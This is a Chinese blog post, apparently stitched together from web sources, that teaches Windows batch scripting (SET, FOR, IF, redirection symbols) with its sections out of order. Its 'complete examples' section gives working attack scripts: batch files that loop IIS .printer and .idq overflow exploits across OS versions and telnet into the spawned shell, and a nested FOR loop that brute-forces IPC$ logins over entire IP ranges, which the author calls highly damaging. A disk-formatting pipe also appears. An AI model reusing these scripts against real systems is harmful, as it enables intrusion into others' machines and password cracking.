Bat File

  • ysjxjf

    2008-10-10 12:50:16
  • IT综合
  • 原创

from the web , tks

[@more@]

SET [variable=[string]]

variable 指定环境变量名称。
string 指定要指派给变量的一系列字符。

仅键入 SET 而不加参数,可以显示当前的环境变量。

如果命令扩展名被启用,SET 会如下改变:

可仅用一个变量激活 SET 命令,等号或值不显示所有前缀匹配
SET 命令已使用的名称的所有变量的值。例如:

SET P

会显示所有以字母 P 打头的变量

如果在当前环境中找不到该变量名称, SET 命令将把 ERRORLEVEL
设置成 1。

SET 命令不允许变量名含有等号。

在 SET 命令中添加了两个新替换:

SET /A expression
SET /P variable=[promptString]

/A 命令选项指定等号右边的字符串为被评估的数字表达式。该表达式
评估器很简单并以递减的优先权顺序支持下列操作:

() - 分组
* / % - 算数运算符
+ - - 算数运算符
<< >> - 逻辑移位
- 按位“与”
^ - 按位“异”
| - 按位“或”
= *= /= %= += -= - 赋值
&= ^= |= <<= >>=
, - 表达式分隔符

如果您使用任何逻辑或取余操作符, 您需要将表达式字符串用
引号扩起来。在表达式中的任何非数字字符串键作为环境变量
名称,这些环境变量名称的值已在使用前转换成数字。如果指定
了一个环境变量名称,但未在当前环境中定义,那么值将被定为
零。这使您可以使用环境变量值做计算而不用键入那些 % 符号
来得到它们的值。如果 SET /A 在命令脚本外的命令行执行的,
那么它显示该表达式的最后值。该分配的操作符在分配的操作符
左边需要一个环境变量名称。除十六进制有 0x 前缀, 八进制
有 0 前缀的,数字值为十进位数字。因此, 0x12 与 18 和 022
相同。请注意八进制公式可能很容易搞混: 08 和 09 是无效的数字,
因为 8 和 9 不是有效的八进制位数。

/P 命令选项允许将变量数值设成用户输入的一行输入。读取输入
行之前,显示指定的 promptString。promptString 可以是空的。

环境变量替换已如下增强:

%PATH:str1=str2%

会扩展 PATH 环境变量,用 "str2" 代替扩展结果中的每个 "str1"。
要有效地从扩展结果中删除所有的 "str1","str2" 可以是空的。
"str1" 可以以星号打头;在这种情况下,"str1" 会从扩展结果的
开始到 str1 剩余部分第一次出现的地方,都一直保持相配。

也可以为扩展名指定子字符串。

%PATH:~10,5%

会扩展 PATH 环境变量,然后只使用在扩展结果中从第 11 个(偏
移量 10)字符开始的五个字符。如果没有指定长度,则采用默认
值,即变量数值的余数。如果两个数字(偏移量和长度)都是负数,
使用的数字则是环境变量数值长度加上指定的偏移量或长度。

%PATH:~-10%

会抽取 PATH 变量的最后十个字符。

%PATH:~0,-2%

会抽取 PATH 变量的所有字符,除了最后两个。

终于添加了延迟环境变量扩充的支持。该支持总是按默认值被
停用,但也可以通过 CMD.EXE 的 /V 命令行命令选项而被启用/停用。
请参阅 CMD /?

考虑到读取一行文本时所遇到的目前扩充的限制时,延迟环境
变量扩充是很有用的,而不是执行的时候。以下例子说明直接
变量扩充的问题:

set VAR=before
if "%VAR%" == "before" (
set VAR=after;
if "%VAR%" == "after" @echo If you see this, it worked
)

不会显示消息,因为在读到第一个 IF 语句时,BOTH IF 语句中
的 %VAR% 会被代替;原因是: 它包含 IF 的文体,IF 是一个
复合语句。所以,复合语句中的 IF 实际上是在比较 "before" 和
"after",这两者永远不会相等。同样。以下这个例子也不会达到
预期效果:

set LIST=
for %i in (*) do set LIST=%LIST% %i
echo %LIST%

原因是,它不会在目前的目录中建立一个文件列表,而只是将
LIST 变量设成找到的最后一个文件。这也是因为 %LIST% 在
FOR 语句被读取时,只被扩充了一次;而且,那时的 LIST 变量
是空的。因此,我们真正执行的 FOR 循环是:

for %i in (*) do set LIST= %i

这个循环继续将 LIST 设成找到的最后一个文件。

延迟环境变量扩充允许您使用一个不同的字符(惊叹号)在执行
时间扩充环境变量。如果延迟的变量扩充被启用,可以将上面
例子写成以下所示,以达到预期效果:

set VAR=before
if "%VAR%" == "before" (
set VAR=after
if "!VAR!" == "after" @echo If you see this, it worked
)

set LIST=
for %i in (*) do set LIST=!LIST! %i
echo %LIST%

如果命令扩展名被启用,有几个动态环境变量可以被扩展,但
不会出现在 SET 显示的变量列表中。每次变量数值被扩展时,
这些变量数值都会被动态计算。如果用户用这些名称中任何
一个定义变量,那个定义会替代下面描述的动态定义:

%CD% - 扩展到当前目录字符串。

%DATE% - 用跟 DATE 命令同样的格式扩展到当前日期。

%TIME% - 用跟 TIME 命令同样的格式扩展到当前时间。

%RANDOM% - 扩展到 0 和 32767 之间的任意十进制数字。

%ERRORLEVEL% - 扩展到当前 ERRORLEVEL 数值。

%CMDEXTVERSION% - 扩展到当前命令处理器扩展名版本号。

%CMDCMDLINE% - 扩展到调用命令处理器的原始命令行。

第四部分:完整案例

以上就是批处理的一些用法。现在我们把这些用法结合起来详细的分析一下目前网上发布的一些批处理,看看他们是怎么运作的。这里我将列举三个例子来详细分析,为了保持程序的完整我的注释会加在/*后面。

例一

这个例子是利用iis5hack.exe对有.printer漏洞的主机进行溢出的批处理。用到的程序有iis5hack.exe和系统自带的telnet.exe。iis5hack的命令格式为:

iis5hack <目标ip> <目标端口> <目标版本> <溢出连接端口>

目标版本为0-9这10个数字分别对应不同语言版本和sp的系统版本,我们编制的批处理使用的命令格式为 开始版本号可有可无。程序如下:

@echo off /*关闭命令回显

if "%1%"=="" goto help /*判断%1是否为空,%1为目标ip

if "%2%"=="1" goto 1 /*判断%2是否为1,为1则跳转标志1

if "%2%"=="2" goto 2 /*%2为开始版本号,如果没有设置则

if "%2%"=="3" goto 3 /*如果存在则从匹配的地方开始执行

if "%2%"=="4" goto 4

if "%2%"=="5" goto 5

if "%2%"=="6" goto 6

if "%2%"=="7" goto 7

if "%2%"=="8" goto 8

if not EXIST iis5hack.exe goto file /*没有发现iis5hack.exe就执行标志file段内容

ping %1 -n 1 | find "Received = 1" /*ping目标1次,从结果中发现Received = 1

if errorlevel 1 goto error /*如果返回代码为1则执行error段(代码1为没有发现 0为发现并成功执行)

iis5hack %1 80 9 88 | find "good" /*开始溢出目标端口80 系统代码9 溢出后连接端口88 /*在执行结果中发现字符串”good”(溢出成功后才会有字符串good)

if not errorlevel 1 goto telnet /*如果没有错误代码1(溢出成功)就执行telnet段的内容。

echo 操作系统类型 9 失败! /否则显示这一句

:8 /*以下代码内容参照上面

iis5hack %1 80 8 88 | find "good"

if not errorlevel 1 goto telnet

echo 操作系统类型 8 失败!

:7

iis5hack %1 80 7 88 | find "good"

if not errorlevel 1 goto telnet

echo 操作系统类型 7 失败!

:6

iis5hack %1 80 6 88 | find "good"

if not errorlevel 1 goto telnet

echo 操作系统类型 6 失败!

:5

iis5hack %1 80 5 88 | find "good"

if not errorlevel 1 goto telnet

echo 操作系统类型 5 失败!

:4

iis5hack %1 80 4 88 | find "good"

if not errorlevel 1 goto telnet

echo 操作系统类型 4 失败!

:3

iis5hack %1 80 3 88 | find "good"

if not errorlevel 1 goto telnet

echo 操作系统类型 3 失败!

:2

iis5hack %1 80 2 88 | find "good"

if not errorlevel 1 goto telnet

echo 操作系统类型 2 失败!

:1

iis5hack %1 80 1 88 | find "good"

if not errorlevel 1 goto telnet

echo 操作系统类型 1 失败!

:0

iis5hack %1 80 0 88 | find "good"

if not errorlevel 1 goto telnet

echo 操作系统类型 0 失败!

goto error

:telnet

telnet %1 88 /*开始连接目标ip的88端口

goto exit /*连接中断后跳转exit段

:error /*error段显示错误后的帮助信息

echo 可能网络不能连接或者对方已经修补该漏洞!请按照下面的格式手工尝试一次!

echo iis5hack [目标IP] [WEB端口] [系统类型] [开放端口]

ECHO 中文: 0

ECHO 中文+sp1: 1

ECHO 英文: 2

ECHO 英文+sp1: 3

ECHO 日语: 4

ECHO 日语+sp1: 5

ECHO 韩文: 6

ECHO 韩文+sp1: 7

ECHO 墨西哥语: 8

ECHO 墨西哥语+sp1: 9

goto exit /*跳转exit段

:file /*file段显示文件没有发现的信息

echo 文件iis5hack.exe没有发现!程序终止运行!

goto exit /*跳转exit段

:help /*help段显示本批处理的使用格式帮助

echo 本程序用法如下:

echo iis [目标ip]

echo iis [目标ip] [开始的号码9-0]

:exit /*exit段为程序出口

这个批处理基本没有什么循环只是一路走下来。所以代码比较长难度不大!

例二

这个例子是用iisidq.exe对有idq漏洞的机器进行溢出的批处理。使用的程序有iisidq.exe和系统自带的程序telnet.exe。iisidq.exe的用法如下:

运行参数: 操作系统类型 目的地址 web端口 1 溢出监听端口 <输入命令1>

其中,如果输入命令参数没有输入,那么,默认为:"cmd.exe"。

其中操作系统类型类型的代码范围是0-14。我们编制的批处理使用的命令格式为 程序如下:

@echo off /*同例一

if not EXIST iisidq.exe goto file /*同例一

if %1 == "" goto error /*同例一

ping %1 -n 1 | find "Received = 1" /*同例一

if errorlevel 1 goto error1 /*同例一

set b=%1 /*创建一个环境变量b,将变量%1的内容传递给环境变量b。变量b的内容以后将是目标ip

set a=0 /*创建一个环境变量a并指定环境变量a为0。由于使用整个批处理的循环所以用a来做计数器。

:no /*no段开始

if %a%==0 set d=0 /*如果环境变量a=0则创建环境变量d设定环境变量d=0。

if %a%==1 set d=1 /*环境变量d其实是操作系统类型代码,用计数器来控制其

if %a%==2 set d=2 /*变动。

if %a%==3 set d=3

if %a%==4 set d=4

if %a%==5 set d=5

if %a%==6 set d=6

if %a%==7 set d=7

if %a%==9 set d=9

if %a%==10 set d=13

if %a%==11 set d=14

goto 0 /*变量传递完成后转到标志0处运行

:1

echo 正在执行第%d%项!与目标%b%不能连接!正在尝试连接请等候......

:0 /*标志0开始

IISIDQ %d% %b% 80 1 99 |find "good"

/*按格式发送溢出命令并在结果中发现字符串good(发送代码成功才会有字符串good)

if errorlevel 1 goto 1 /*如果没有good字符串则没有发送成跳

/*转标志1处继续尝试发送

ping 127.0.0.1 -n 8 >nul /*ping自己8次相当于延时8秒不显示执

/*行结果

echo 正在执行第%d%项! /*报告正在溢出的操作系统类型

telnet %b% 99 /*连接溢出端口

echo. /*显示一个空行

if %d%==14 goto error1 /*如果操作系统类型为14则跳转error1处(循环出口)

if %d%==13 set a=11 /*开始用计数器对操作系统代码重新附值

if %d%==9 set a=10

if %d%==7 set a=9

if %d%==6 set a=7

if %d%==5 set a=6

if %d%==4 set a=5

if %d%==3 set a=4

if %d%==2 set a=3

if %d%==1 set a=2

if %d%==0 set a=1

goto no /*附值完成跳转no段执行

:file /*以下都是出错后的帮助提示

echo IIsidq.exe没有发现!将该文件和本文件放在同一目录!

goto exit

:error

echo 错误!目标ip不可识别!请使用下面的格式连接!

echo idq [目标IP]

goto exit

:error1

echo 连接没有成功!可能目标机器已经修补了该漏洞或者网络故障所至!

echo 请按照下面的格式手工尝试!

echo iisidq [目标类型] [目标IP] [目标端口] [连接方式] [溢出端口]

echo telnet [目标ip] [溢出端口]

:exit /*整个程序的出口

这个批处理采用的整体循环掌握好计数器部分就掌握了这个批处理。

例三

for /l %%a in (0,1,255) do for /l %%b in (0,1,255) do for /l %%c in

(1,1,254) do for /f "tokens=1,2*" %%e in (userpass.txt) do net use

%1.%%a.%%b.%%cipc$ %%e /u:%%f

上面的命令为1条命令。大家可以看出该命令使用了4个FOR来套用的。用法为:C:>TEST.BAT 218

当输入218回车后该命令会由第1个for取初始值0为%%a然后继续取第2个for的初始值0为%%b继续取第3个for的初始值1为%%c最后一个for是将userpass.txt中的第一段字符作为密码%%e第二段字符作为用户名%%f最后执行命令(这里我把上面的值都带进去,设密码为123 用户名为 abc)

net usr 218.0.0.1ipc$ 123 /u:abc

当然上面这个例子可能有些朋友会说太简单并且太死板不灵活。修改后的程序可以灵活的查找你指定开始到结束或你指定开始到最大ip的范围。当然功能还可以在加强,至于能加强到什么地步能不能成为一个新的工具那就是你的事了。这个的循环动作大了点主要是ip的数字替换麻烦所以没办法。这个批处理我就不写注释了,大家好好的参考上面的内容你会很快看懂这个批处理的。看懂了得不要说简单哦!最起码这是个没有使用任何第三方工具就能探测并保存弱口令的批处理了!!简单的改一改杀伤力还是很大的。以上这些批处理全部在win2000和xp下测试通过最大的优点就是只有一个批处理文件并且绝对不会误报。缺点就是太长!

第三部分:批处理与变量

在批处理中适当的引用变量将会使你所编制的程序应用面更广。批处理每次能处理的变量从%0~%9共10个。其中%0默认给批处理的文件名使用。除非在使用SHIFT命令后%0才能被%1所替代。引用shift命令的例子如果把%1前面多加上一个%0那么结果如下:

C::>SHIFT.BAT 1 2 3 4 5 6 7 8 9 10 11

SHIFT.BAT 1 2 3 4 5 6 7 8 9

1 2 3 4 5 6 7 8 9 10

2 3 4 5 6 7 8 9 10 11

系统是如何区分每个变量的呢,系统区分变量的规则为字符串中间的空格,即只要发现空格就把空格前面的字符当作一个变量而空格后面的字符则作为另一个变量。如果你的变量是一个当中包含空格的长目录名这时候你需要用上一节特殊符号8中所用的引号将他圈起来。例:

批处理内容为:

ECHO %1

ECHO %2

ECHO %3

输入命令:

C:>TEST “Program Files” Program Files

Program Files

Program

Files

在一个复杂的批处理中又可能同时使用的变量会超过10个这时候会和系统的规则冲突,那么这个问题怎么解决呢?在系统中还有一种变量称之为环境变量(使用SET命令可以查看当前系统的环境变量)如当前系统目录是%windir%或%SystemRoot%等。当同时使用的参数超过10个的时候,我们可以把某些在后面的程序中还要调用的变量保存为环境变量。具体用法如

SET A=%1 这样我们就命名了一个新的环境变量A

在调用变量A的时候要%A%这样调用,环境变量不受SHIFT命令影响。如果要改变一个环境变量需要重新对其设置才能改变。当然也可以进行变量与变量之间的传递来达到目的。下面我们来看一个例子,批处理如下:

ECHO OFF

SET PASS=%1

SHIFT

SET PASS1=%1

SHIFT

ECHO %PASS% %PASS1% %1 %2 %3 %4 %5 %6 %7 %8 %9

SHIFT

ECHO %PASS% %PASS1% %9

SET PASS=%PASS1% 变量的传递

SET PASS1=%9

SHIFT

ECHO %PASS% %PASS1% %9

使用命令:C:>TEST A B 3 4 5 6 7 8 9 10 K L

A B 3 4 5 6 7 8 9 10 K 注意:这一行显示了11个变量

A B L 在使用了3次SHIFT之后%9变成了L

B L 变量的传递后的结果

第二部分:特殊的符号与批处理

在命令行下有些符号是不允许使用的但有些符号却有着特殊的意义。

1、 符号(@)

@在批处理中的意思是关闭当前行的回显。我们从上面知道用命令echo off可以关掉整个批处理的命令回显但却不能不显示echo off这个命令。现在我们在这个命令前加上@这样echo off这一命令就被@关闭了回显从而达到所有命令均不回显得要求

2、 符号(>)

>的意思是传递并覆盖。他所起的作用是将运行后的回显结果传递到后面的范围(后面可是文件也可是默认的系统控制台)例:

文件1.txt的文件内容为:1+1

使用命令c:>dir *.txt >1.txt

这时候1.txt的内容如下:

驱动器 C 中的卷没有标签。

卷的序列号是 301A-1508

C: 的目录

2003-03-11 14:04 1,005 FRUNLOG.TXT

2003-04-04 16:38 18,598,494 log.txt

2003-04-04 17:02 5 1.txt

2003-03-12 11:43 0 aierrorlog.txt

2003-03-30 00:35 30,571 202.108.txt

5 个文件 18,630,070 字节

0 个目录 1,191,542,784 可用字节

>将命令执行的结果覆盖了原始的文件内容。

在传递给控制台的时候程序将不会有任何回显(注意:这里的回显跟echo off关掉的回显不是同一概念。Echo off关掉的是输入命令的回显,这里的回显是程序执行中或后的回显)例:

C:>dir *.txt >nul

程序将没有任何显示也不会产生任何痕迹。

3、 符号(>>)

符号>>的作用与符号>相似,但他们的区别在于>>是传递并在文件末尾追加>>也可将回显传递给控制台(用法同上)例:

文件1.txt内同为:1+1

使用命令c:>dir *.txt >>1.txt

这时候1.txt的内容如下:

1+1

驱动器 C 中的卷没有标签。

卷的序列号是 301A-1508

C: 的目录

2003-03-11 14:04 1,005 FRUNLOG.TXT

2003-04-04 16:38 18,598,494 log.txt

2003-04-04 17:02 5 1.txt

2003-03-12 11:43 0 aierrorlog.txt

2003-03-30 00:35 30,571 202.108.txt

5 个文件 18,630,070 字节

0 个目录 1,191,542,784 可用字节

>>将命令执行的结果覆加在了原始的文件内容后面。

4、 符号(|)

|是一个管道传输命令意思是将上一命令执行的结果传递给下一命令去处理。例:

C:>dir c:|find "1508"

卷的序列号是 301A-1508

以上命令的意思为查找c:的所有并发现1508字符串。Find的用法请用 find /?自行查看

在不使用format的自动格式化参数的时候我是这样来自动格式化盘片的

echo y|format a: /s /q /v:system

用过format命令的人都知道format有一个交互对化过程,要使用者输入y来确定当前的命令是否被执行。在这个命令前加上echo y并用管道传输符|将echo执行的结果y传递给format从而达到手工输入y的目的(这条命令有危害性,测试的时候请谨慎)

5、 符号(^)

^ 是对特殊符号 > 、<、 &、的前导字符。在命令中他将以上的3个符号的特殊动能去掉仅仅只把他们当成符号而不使用他们的特殊意义。例:

c:>echo test ^> 1.txt

test > 1.txt

从上面可以看出并没有把test写入文件1.txt而是将test >1.txt 当字符串显示了出来。这个符号在远程构建批处理的时候很有效果。

6、 符号(&)

&符号允许在一行中使用2个以上不同的命令,当第一个命令执行失败将不影响第2个命令的执行。例:

c:> dir z: &dir y: &dir c:

以上的命令将会连续显示z: y: c:盘内的内容不理会该盘符是否存在。

7、 符号(&&)

&&符号也是允许在一行中使用2个以上不同的命令,当第一个命令执行失败后后续的命令将不会再被执行。例:

c:> dir z: &&dir y: &&dir c:

以上的命令将会提示检查是否存在z:盘如果存在则执行,如果不存在则停止执行所有的后续命令

8、 符号(" ")

" "符号允许在字符串中包含空格。进入一个特殊的目录可以用如下方法例:

c:>cd “Program Files”

c:>cd progra~1

c:>cd pro*

以上方法都可以进入Program Files目录

9、 符号(,)

,符号相当于空格。在某些特殊的情况下可以用,来代替空格使用。例:

c:>dir,c:

10、 符号(;)

;符号当命令相同的时候可以将不同的目标用;隔离开来,但执行效果不变。如执行过程中发生错误则只返回错误报告而程序不会继续执行。例:

DIR C:;D:;E:F:

以上的命令相当于

DIR C:

DIR D:

DIR E:

DIR F:

当然还有些特殊的符号但他们的使用范围很小我就不再这里一一的说明了。

1.如果你的目的是设置环境变量,设置hihi变量为一个随机数用:
SET HIHI=%RANDOM%

2.如果你的目的是生成一个随机数写到文本中,用:
echo %RANDOM%>C:1.txt

3.如果你想二者都有,用:
SET /A HIHI=%RANDOM >C:1.TXT
这时变量和文本中数字一样。

每执行一次%RANDOM%,便会生成一个随机数。
所以
set HIHI=%RANDOM%&echo %HIHI%>C:1.txt
这条指令的第一个RANDOM生成一个随机数set给HIHI。
第二个%HIHI%又生成了另一个随机数写到了1.txt中
所以变量HIHI和文本中的随机数是不同的。

第一类 直接赋值 SET [variable=[string]]

例子:
 
  @echo off  
  set var=所赋的值
  echo %var%
  pause  
  
说明:set(命令) var(变量名) "所赋的值"就是给变量的值

第二类 SET /P variable=[promptString]
  
  用引用把var变量名用两个%(百分号)扩起来,如%var%,这种SET语法只能直接在BAT代码的提前赋予变量的值,有时候我们需要提供一个交互界面,让用户自己输入变量的值,然后我们在来根据这个值来做相应操作,SET的这种语法,只需要加一个"/P"参数就可以了。
  
  例子:
  
  @echo off
  
  set /p var=请输入变量的值:
  
  if %var% == 1 echo 您输入了 1
  
  pause
  
说明:set /p 是命令语法 var是变量名 =号右边的"请输入变量的值: ",是提示语,不是变量的值,运行后,我们在提示语后面直接输入1,就会显示一行您输入了 1 ,输入别的就没有任何反映。
  
第三类 SET /A expression 
  
  
  环境变量替换已如下增强:
  
  %PATH:str1=str2%
  
  %PATH:~10,5%
  
  %PATH:~-10%
  
  %PATH:~0,-2%
  
  这机种语法有什么用处呢?现在我们来一个个讲解他们
  
  SET /A expression
  
  /A 命令行开关指定等号右边的字符串为被评估的数字表达式。该表达式评估器很简单并以递减的优先权顺序支持下列操作:
  
   () - 分组
  
   ! ~ - - 一元运算符
  
   * / % - 算数运算符
  
   + - - 算数运算符
  
   << >> - 逻辑移位
  
   & - 按位“与”
  
   ^ - 按位“异”
  
   | - 按位“或”
  
   = *= /= %= += -= - 赋值
  
   &= ^= |= <<= >>=
  
   , - 表达式分隔符
  
  上面这些是系统帮助里的内容,解释一下:
  
  set的/A参数就是让SET可以支持数学符号进行加减等一些数学运算,
  
  现在开始举例子介绍这些数学符号的用法:
  
  看例子 这里的例子请直接在CMD下拷贝命令运行,不需要保存为BAT!
  
  set /a var=1 + 1
  
  set /a 语法, var变量名 1 + 1 数学式子
  
  拷贝运行后会直接显示一个2,或者运行完后我们输入echo %var%,也是二,这就是
  
  一个简单的加法运算!
  
  set /a var=2 - 1 结果是多少呢?如果你看不到结果就echo %var%.....
  
  set /a var=2 * 2 乘法运算
  
  set /a var=2 / 2 除法运算
  
  set /a var=(1+1) + (1+1) 结果等于4 看得懂吧!
  
  set /a a=1+1,b=2+1,c=3+1 运行后会显示一个4,但我们用
  
  echo %a% %b% %c%后看结果,会发现其他数学运算也有效果!,这就是","号的
  
  作用!
  
  有时候我们需要直接在原变量进行加减操作就可以用这种语法
  
  set /a var+=1 这样的语法对应原始语法就是set /a var = %var% + 1
  
  都是一样的结果,在原变量的值上在进行数学运算,不过这样写简单一点
  
  在来一个:
  
  set /a var*=2
  
  其他都这么用,只要帮助里有这个语法!
  
  另外还有一些用逻辑或取余操作符,这些符号,按照上面的使用方法会报错的
  
  比如我们在CMD里输入set /a var=1 & 1 "与运算",他并不会显示为1,而是报错,
  
  为什么?对于这样的"逻辑或取余操作符",我们需要把他们用双引号引起来,看例子

  
  set /a var= 1 "&" 1 这样结果就显示出来了,其他逻辑或取余操作符用法
  
  set /a var= 1 "^" 1 异运算
  
  set /a var= 1 "%" 1 取模运算
  
  set /a var= 2 "<<" 2 次方运算
  
  set /a var= 4 ">>" 2 这个不太记得数学里的叫法....
  
  还有几个数学不太行,搞不清楚了....不列出来了,
  
  这些符号也可以用&= ^= |= <<= >>= 这样的简单用法如
  
  set /a var"&=" 1 等于set /a var = %var% "&" 1 注意引号
  
  好符号说到这,现在说%PATH:str1=str2%
  
  这个是替换变量值的内容,看例子
  
  @echo off  
  set a= bbs.verybat.cn  
  echo 替换前的值: "%a%"  
  set var=%a: =% 
  echo 替换后的值: "%var%"
pause

  
  对比一下,我们发现他把变量%a%的空格给替换掉了,从这个例子,我们就可以发现%PATH:str1=str2%这个操作就是把变量%PATH%的里的str1全部用str2替换比如我们把上面的例子改成这样
  
  @echo off  
  set a=bbs.verybat.cn  
  echo 替换前的值: "%a%"  
  set var=%a:.=伤脑筋%  
  echo 替换后的值: "%var%"  
  pause
  
  解释set var=%a:.=伤脑筋% set命令 var变量名 字a是要进行字符替换的变量的值,"."为要替换的值,"伤脑筋"为替换后的值!
  
  执行后就会把变量%a%里面的"."全部替换为"伤脑筋"
  
  这就是set的替换字符的很好的功能!  
  %PATH:~10,5% 这个什么意思,看例子:
  
  @echo off  
  set a=bbs.verybat.cn  
  set var=%a:~1,2%
  echo %var%
  pause
  
  执行后,我们会发现只显示了"bs"两个字母,我们的变量%a%的值不是为bbs.verybat.cn吗?怎么只显示了第2个字母和第3个字母"bs",分析一结果我们就可以很容易看出:  
  %PATH:~10,5%就是显示变量PATH里指定几位的值!
  
  分析set var=%a:~1,2%
  
   set命令 var变量值 a要进行字符操作的变量 "1"从变量"a"第几位开始显示 "2"显示几位
  
  和起来就是把变量a的值从第一位开始,把后两位赋予给变量var
  
  
  其他两种语法
  
  %PATH:~-10%
  
  %PATH:~0,-2%
  
  他们也是显示指定变量指定几位的值得的意思
  
  %PATH:~-10% 例子
  
  @echo off
  
  set a=bbs.verybat.cn
  
  set var=%a:~-3%
  
  echo %var%
  
  pause
  
  这个就是把变量a倒数3位的值给变量VAR
  
  当然我们也可以改成这样
  
  @echo off
  
  set a=bbs.verybat.cn
  
  set var=%a:~3%
  
  echo %var%
  
  pause
  
  这个就是把变量a的前3位的值给变量VAR
  
  %PATH:~0,-2% 例子
  
  @echo off
  
  set a=bbs.verybat.cn
  
  set var=%a:~0,-3%
  
  echo %var%
  
  pause
  
  执行后,我们发现显示的是"bbs.verybat",少了".cn"
  
  从结果分析,很容易分析出,这是把变量a的值从0位开始,
  
  显示变量a总位数-3的位的值得(我们给变量a的的值bbs.verybat有11位,11-3=8),这样他就
  
  只显示从第0位开始到第8位的值,并赋予给变量var
  
  如果改成这样
  
  @echo off  
  set a=bbs.verybat.cn  
  set var=%a:~2,-3%  
  echo %var%  
  pause
  
  那么他就是显示从第2位开始到第8位的值,并赋予给变量var

关于批处理的FOR,SET,IF
2008年02月28日 星期四 下午 04:37

批处理中的FOR,SET,IF是批处理中比较难的,下面是本人学这几个命令时觉得比较好的教程

if 表示将判断是否符合规定的条件,从而决定执行不同的命令。

有三种格式:

1)、if "参数" == "字符串" 待执行的命令
参数如果等于指定的字符串,则条件成立,运行命令,否则运行下一句。(注意是两个等号)

如if "%1"=="a" format a:
if {%1}=={} goto noparms
if {%2}=={} goto noparms

2)、if exist 文件名 待执行的命令
如果有指定的文件,则条件成立,运行命令,否则运行下一句。

如if exist config.sys edit config.sys

3)、if errorlevel / if not errorlevel 数字 待执行的命令
如果返回码等于指定的数字,则条件成立,运行命令,否则运行下一句。

如if errorlevel 2 goto x2

DOS程序运行时都会返回一个数字给DOS,称为错误码errorlevel或称返回码,常见的返回码为0、1。

for 命令

for 命令是一个比较复杂的命令,主要用于参数在指定的范围内循环执行命令。
在批处理文件中使用 FOR 命令时,指定变量请使用 %%variable

for {%variable│%%variable} in (set) do command [ CommandLineOptions]
%variable 指定一个单一字母可替换的参数。
(set) 指定一个或一组文件。可以使用通配符。
command 指定对每个文件执行的命令。
command-parameters 为特定命令指定参数或命令行开关。

在批处理文件中使用 FOR 命令时,指定变量请使用 %%variable
而不要用 %variable。变量名称是区分大小写的,所以 %i 不同于 %I

如果命令扩展名被启用,下列额外的 FOR 命令格式会受到支持:
FOR /D %variable IN (set) DO command [command-parameters]

如果集中包含通配符,则指定与目录名匹配,而不与文件名匹配。

FOR /R [[drive:]path] %variable IN (set) DO command [command-parameters]

检查以 [drive:]path 为根的目录树,指向每个目录中的FOR 语句。如果在 /R 后没有指定目录,则使用

当前目录。如果集仅为一个单点(.)字符,则枚举该目录树。

FOR /L %variable IN (start,step,end) DO command [command-parameters]

该集表示以增量形式从开始到结束的一个数字序列。
因此,(1,1,5) 将产生序列 1 2 3 4 5,(5,-1,1) 将产生
序列 (5 4 3 2 1)。

FOR /F ["options"] %variable IN (file-set) DO command
FOR /F ["options"] %variable IN ("string") DO command
FOR /F ["options"] %variable IN ('command') DO command

或者,如果有 usebackq 选项:

FOR /F ["options"] %variable IN (file-set) DO command
FOR /F ["options"] %variable IN ("string") DO command
FOR /F ["options"] %variable IN ('command') DO command

filenameset 为一个或多个文件名。继续到 filenameset 中的下一个文件之前,每份文件都已被打开、读

取并经过处理。
处理包括读取文件,将其分成一行行的文字,然后将每行解析成零或更多的符号。然后用已找到的符号字符串变量值调用 For 循环。以默认方式,/F 通过每个文件的每一行中分开的第一个空白符号。跳过空白行。您可通过指定可选 "options" 参数替代默认解析操作。这个带引号的字符串包括一个或多个指定不同 解析选项的关键字。这些关键字为:
eol=c - 指一个行注释字符的结尾(就一个)
skip=n - 指在文件开始时忽略的行数。
delims=xxx - 指分隔符集。这个替换了空格和跳格键的默认分隔符集。
tokens=x,y,m-n - 指每行的哪一个符号被传递到每个迭代的 for 本身。这会导致额外变量名称的 格式为一个范围。通过 nth 符号指定 m 符号字符串中的最后一个字符星号,那么额外的变量将在最后一

个符号解析之分配并接受行的保留文本。
usebackq - 指定新语法已在下类情况中使用:
在作为命令执行一个后引号的字符串并且引号字符为文字字符串命令并允许在 file-set中使用双引号扩起

文件名称。

sample1:
FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do command

会分析 myfile.txt 中的每一行,忽略以分号打头的那些行,将每行中的第二个和第三个符号传递给 for

程序体;用逗号和/或 空格定界符号。请注意,这个 for 程序体的语句引用 %i 来取得第二个符号,引用 %j 来取得第三个符号,引用 %k来取得第三个符号后的所有剩余符号。对于带有空格的文件名,您需要用

双引号将文件名括起来。为了用这种方式来使用双引号,您还需要使用 usebackq 选项,否则,双引号会

被理解成是用作定义某个要分析的字符串的。

%i 专门在 for 语句中得到说明,%j 和 %k 是通过tokens= 选项专门得到说明的。您可以通过 tokens=

一行指定最多 26 个符号,只要不试图说明一个高于字母 'z' 或'Z' 的变量。请记住,FOR 变量是单一字

母、分大小写和全局的;同时不能有 52 个以上都在使用中。

您还可以在相邻字符串上使用 FOR /F 分析逻辑;方法是,用单引号将括号之间的 filenameset 括起来。

这样,该字符串会被当作一个文件中的一个单一输入行。

最后,您可以用 FOR /F 命令来分析命令的输出。方法是,将括号之间的 filenameset 变成一个反括字符

串。该字符串会被当作命令行,传递到一个子 CMD.EXE,其输出会被抓进内存,并被当作文件分析。因此

,以下例子:

FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i

会枚举当前环境中的环境变量名称。

另外,FOR 变量参照的替换已被增强。您现在可以使用下列选项语法:

~I - 删除任何引号("),扩充 %I
%~fI - 将 %I 扩充到一个完全合格的路径名
%~dI - 仅将 %I 扩充到一个驱动器号
%~pI - 仅将 %I 扩充到一个路径
%~nI - 仅将 %I 扩充到一个文件名
%~xI - 仅将 %I 扩充到一个文件扩展名
%~sI - 扩充的路径只含有短名
%~aI - 将 %I 扩充到文件的文件属性
%~tI - 将 %I 扩充到文件的日期/时间
%~zI - 将 %I 扩充到文件的大小
%~$PATH:I - 查找列在路径环境变量的目录,并将 %I 扩充到找到的第一个完全合格的名称。如果环境变

量未被定义,或者没有找到文件,此组合键会扩充空字符串

可以组合修饰符来得到多重结果:

%~dpI - 仅将 %I 扩充到一个驱动器号和路径
%~nxI - 仅将 %I 扩充到一个文件名和扩展名
%~fsI - 仅将 %I 扩充到一个带有短名的完整路径名
%~dp$PATH:i - 查找列在路径环境变量的目录,并将 %I 扩充到找到的第一个驱动器号和路径。
%~ftzaI - 将 %I 扩充到类似输出线路的 DIR

在以上例子中,%I 和 PATH 可用其他有效数值代替。%~ 语法用一个有效的 FOR 变量名终止。选取类似

%I 的大写变量名比较易读,而且避免与不分大小写的组合键混淆。

